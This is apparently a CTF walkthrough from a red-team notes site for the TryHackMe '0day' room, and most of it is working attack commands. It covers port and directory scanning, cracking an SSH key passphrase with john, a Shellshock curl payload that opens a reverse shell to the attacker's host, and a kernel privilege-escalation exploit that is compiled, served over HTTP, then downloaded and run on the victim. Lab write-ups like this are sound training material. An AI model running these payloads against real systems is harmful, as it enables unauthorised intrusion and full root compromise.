> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/0day.md).

# 0day

**Room Link:** <https://tryhackme.com/room/0day>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/He8iQFlKxvgqJ4GqxHKK" alt=""><figcaption></figcaption></figure>

### Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/8tcjA6ueQAk5k6UuxyT7" alt=""><figcaption></figcaption></figure>

### TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/raoQ8AUegbXzZsOdi2h3" alt=""><figcaption></figcaption></figure>

This appeared to be a rabbit hole but I found a key and was able to bruteforce the password for it.

<figure><img src="/files/aWMdiWC3lKc3LSxzajyZ" alt=""><figcaption></figcaption></figure>

**Kali**

```
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 
```

<figure><img src="/files/PDwgtlDAjywNyhSXmFuW" alt=""><figcaption></figcaption></figure>

I found a cgi file. i tried checking if it was vulnerable to shellshock which wasn't working but it was vulnerable.&#x20;

**Kali**

```
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
```

<figure><img src="/files/QtfEfkXPig9USCQTz8U7" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Link:** <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi>

**Kali#1**

```
nc -lvnp 4242
```

**Kali #2**

```
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi 
```

<figure><img src="/files/DU2Vsue0LawNiU0USwiU" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

## Privilege Escalation

**Victim**

```
uname -a 
```

<figure><img src="/files/vuSoDewQwmyKVB6WUhRm" alt=""><figcaption></figcaption></figure>

**Kali**

```
searchsploit 3.13.0
searchsploit -m linux/local/37292.c
gcc 37292.c -o exploit
python2 -m SimpleHTTPServer 81
```

<figure><img src="/files/ULo39yzCrLRssDC38nc6" alt=""><figcaption></figcaption></figure>

The exploit didn't work as it's complaining that it can't create dynamic library

**Victim**

```
cd /tmp/
wget http://10.10.91.55:81/exploit
chmod +x exploit
./exploit
```

<figure><img src="/files/m99KlmmfbcnsgQYUZo8y" alt=""><figcaption></figcaption></figure>

To fix this we just had to export the binpath from the machine

**Victim**

```
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
./exploit
```

<figure><img src="/files/EG1ZZCNSjhcQ7tZm1ZdO" alt=""><figcaption></figcaption></figure>
